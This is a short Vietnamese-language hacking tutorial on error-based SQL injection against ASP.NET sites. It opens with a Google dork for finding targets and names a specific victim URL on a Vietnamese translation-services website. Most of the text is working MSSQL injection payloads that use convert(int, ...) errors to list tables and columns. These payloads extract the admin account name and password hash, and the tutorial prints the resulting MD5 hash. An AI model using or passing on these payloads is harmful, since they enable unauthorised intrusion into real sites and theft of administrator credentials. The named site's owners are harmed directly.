sql aspx

1. Google Dork : inurl:Default.aspx?PageID=
2.  
3. bước 1:đượng nhiên là phải check link lỗi rùi ( nhưng làm sao??)
4.  
5. đối với site aspx ,ta chỉ thêm dấu ' cuối đường link ID= và sp= thui
6.  
7. Victim:http://dichthuattinhanh.com.vn/InfoDetail.aspx?lang=vn&&MaDM=67&MaIF=1217
8.  
9.  
10. ok chúng ta sẽ thêm ' đằng sau 1217 nhé
11.  
12. ok nó lỗi aspx Unclosed quotation mark after the character string ''.
13.  
14. và chúng ta sẽ get table nó bằng cách thêm mã này vào
15.  
16. and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
17.  
18. chúng ta phải bỏ ' để bug dc nhé
19. ok nó ra nvarchar value 'Member' to data type int.
20.  
21. table member
22.  
23. ok tiếp tục truy ra nào :
24.  
25. and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Member')))-- -
26.  
27. ra 'Information' vậy mình add đằng sau:
28.  
29. and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Member','Information')))-- -
30.  
31. ok cứ thêm cho tới khi nó ra user hay là admin là ok
32.  
33.  
34. vậy là tbale chứa username và password là Admin
35.  
36. tiếp : chúng ta cần truy vấn tên các columns
37.  
38. bằng
39.  
40. and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('Admin') ))-- -
41.  
42. và chúng ta làm như get table nhé
43.  
44. and column_name not in ('AdminID')))-- -
45.  
46. và tiếp tới AdminMail là hết vậy chùng ta get user +pass nó nào
47.  
48. bằng cách add lệnh này
49.  
50. and 1=convert(int,(select top 1 AdminId from Admin))-- -
51.  
52. và user nó là Admin
53.  
54. tiếp là pass
55.  
56. and 1=convert(int,(select top 1 AdminPass from Admin))-- -
57.  
58. efffb721c4a66dad5a94509e58c539cb<=mã MD5